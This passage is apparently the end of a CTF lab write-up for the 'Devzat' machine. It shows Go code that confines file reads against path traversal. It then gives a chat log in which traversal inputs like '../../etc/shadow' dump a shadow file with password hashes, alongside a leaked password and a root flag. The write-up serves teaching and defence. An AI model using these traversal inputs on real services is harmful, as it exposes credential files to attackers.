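// that is not under cwd. An absolute path is still treated as relative,
// which matches the "/root/devzat/etc/shadow" behaviour seen in the log.
func joinConfined(cwd, path string) (string, error) {
	full := filepath.Join(cwd, path)
	if !within(cwd, full) {
		return "", errOutsideRoot
	}
	return full, nil
}

// readConfined is the replacement for the os.Stat/os.Open pair. It repeats
// the containment check after resolving symlinks, because a link placed
// inside cwd can otherwise point anywhere on the filesystem.
func readConfined(cwd, path string) ([]byte, error) {
	full, err := joinConfined(cwd, path)
	if err != nil {
		return nil, err
	}
	root, err := filepath.EvalSymlinks(cwd)
	if err != nil {
		return nil, err
	}
	target, err := filepath.EvalSymlinks(full)
	if err != nil {
		return nil, err
	}
	if !within(root, target) {
		return nil, errOutsideRoot
	}
	return os.ReadFile(target)
}

func main() {
	cwd := "/root/devzat" // constructed: the working directory implied by the chat log
	for _, p := range []string{"art.txt", "../root.txt", "../../etc/shadow", "/etc/shadow"} {
		confined, err := joinConfined(cwd, p)
		fmt.Printf("%-18s vulnerable=%-26s confined=%q err=%v\n", p, joinVulnerable(cwd, p), confined, err)
	}
}
```

Note that a prefix check on the cleaned string alone is not sufficient: `/root/devzat` is a string prefix of `/root/devzatx`, which is why the check above goes through filepath.Rel rather than strings.HasPrefix on the full path.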

catherine@devzat:/tmp$ ssh -l test localhost -p 8443
2 hours 10 minutes earlier
catharine: file
devbot: catharine has left the chat
devbot: catharine stayed on for 2 minutes
2 hours 6 minutes earlier
devbot: admin has joined the chat
admin: file
devbot: admin has left the chat
1 hour 54 minutes earlier
devbot: patrick has joined the chat
devbot: patrick has left the chat
devbot: patrick stayed on for 1 minute
1 hour 48 minutes earlier
devbot: catherine has joined the chat
catherine: file /etc/passwd woBeeYareedahc7Oogeephies7Aiseci
1 hour 44 minutes earlier
devbot: catherine has left the chat
devbot: catherine stayed on for 4 minutes
1 hour 39 minutes earlier
devbot: catherine has joined the chat
1 hour 23 minutes earlier
devbot: catherine has left the chat
devbot: catherine stayed on for 16 minutes
Welcome to the chat. There are no more users
devbot: test has joined the chat
1 minute in
test: /file ../root.txt CeilingCatStillAThingIn2021?
[SYSTEM] 67f13f5a6aa22e9cf52f57f19c76f86d
test: /file ../etc/shadow CeilingCatStillAThingIn2021?
[SYSTEM] The requested file @ /root/etc/shadow does not exist!
test: /file /etc/shadow CeilingCatStillAThingIn2021?
[SYSTEM] The requested file @ /root/devzat/etc/shadow does not exist!
3 minutes in
test: /file ../../etc/shadow CeilingCatStillAThingIn2021?
[SYSTEM] root:$6$DKdyL4hqyhhxcRyc$8N.1K/dHPqLb7VSB0IvfB.uhIKsH7IeGP/iyTRSYImFiAa
wsaUOKs/TWe0DCp5wSscYvi.XjX8JPe6lZNnEmH/:18891:0:99999:7:::
[SYSTEM] daemon:*:18659:0:99999:7:::
[SYSTEM] bin:*:18659:0:99999:7:::
[SYSTEM] sys:*:18659:0:99999:7:::
[SYSTEM] sync:*:18659:0:99999:7:::
[SYSTEM] games:*:18659:0:99999:7:::
[SYSTEM] man:*:18659:0:99999:7:::
[SYSTEM] lp:*:18659:0:99999:7:::
[SYSTEM] mail:*:18659:0:99999:7:::
[SYSTEM] news:*:18659:0:99999:7:::
[SYSTEM] uucp:*:18659:0:99999:7:::
[SYSTEM] proxy:*:18659:0:99999:7:::
[SYSTEM] www-data:*:18659:0:99999:7:::
[SYSTEM] backup:*:18659:0:99999:7:::
[SYSTEM] list:*:18659:0:99999:7:::
[SYSTEM] irc:*:18659:0:99999:7:::
[SYSTEM] gnats:*:18659:0:99999:7:::
[SYSTEM] nobody:*:18659:0:99999:7:::
[SYSTEM] systemd-network:*:18659:0:99999:7:::
[SYSTEM] systemd-resolve:*:18659:0:99999:7:::
[SYSTEM] systemd-timesync:*:18659:0:99999:7:::
[SYSTEM] messagebus:*:18659:0:99999:7:::
[SYSTEM] syslog:*:18659:0:99999:7:::
[SYSTEM] _apt:*:18659:0:99999:7:::
[SYSTEM] tss:*:18659:0:99999:7:::
[SYSTEM] uuidd:*:18659:0:99999:7:::
[SYSTEM] tcpdump:*:18659:0:99999:7:::
[SYSTEM] landscape:*:18659:0:99999:7:::
[SYSTEM] pollinate:*:18659:0:99999:7:::
[SYSTEM] sshd:*:18800:0:99999:7:::
[SYSTEM] systemd-coredump:!!:18800::::::
[SYSTEM] patrick:$6$7ni9PM4l99B7EKPi$/uLBm1IhrKmkS9xPaIgRRZj8aVfASc4eIZt.FvNDEz2
r06MIsQMEf3bNegOIxGI./UsabjqsRSV6hWxrJrqbj0:18800:0:99999:7:::
[SYSTEM] catherine:$6$.T9ZmexDFzOpXCH/$u9TICZ3NN5HOC1lWNHGuXP0Hyn/R8HMPS12kUgFdP
AwUNl8F3qd5yuL6ptmW40IrBLxBMOTjskHfu1CwK72bw0:18800:0:99999:7:::
[SYSTEM] usbmux:*:18800:0:99999:7:::

Summary of knowledge

  • vhost fuzzing
  • directory fuzzing
  • dumping and extracting an exposed .git directory
  • command injection in Go source (exec.Command with sh -c)
  • chisel reverse port forwarding
  • InfluxDB authentication bypass (CVE-2019-20933)
  • path traversal in a Go file-read command

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I’m lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security researcher, hacker, bug hunter and more…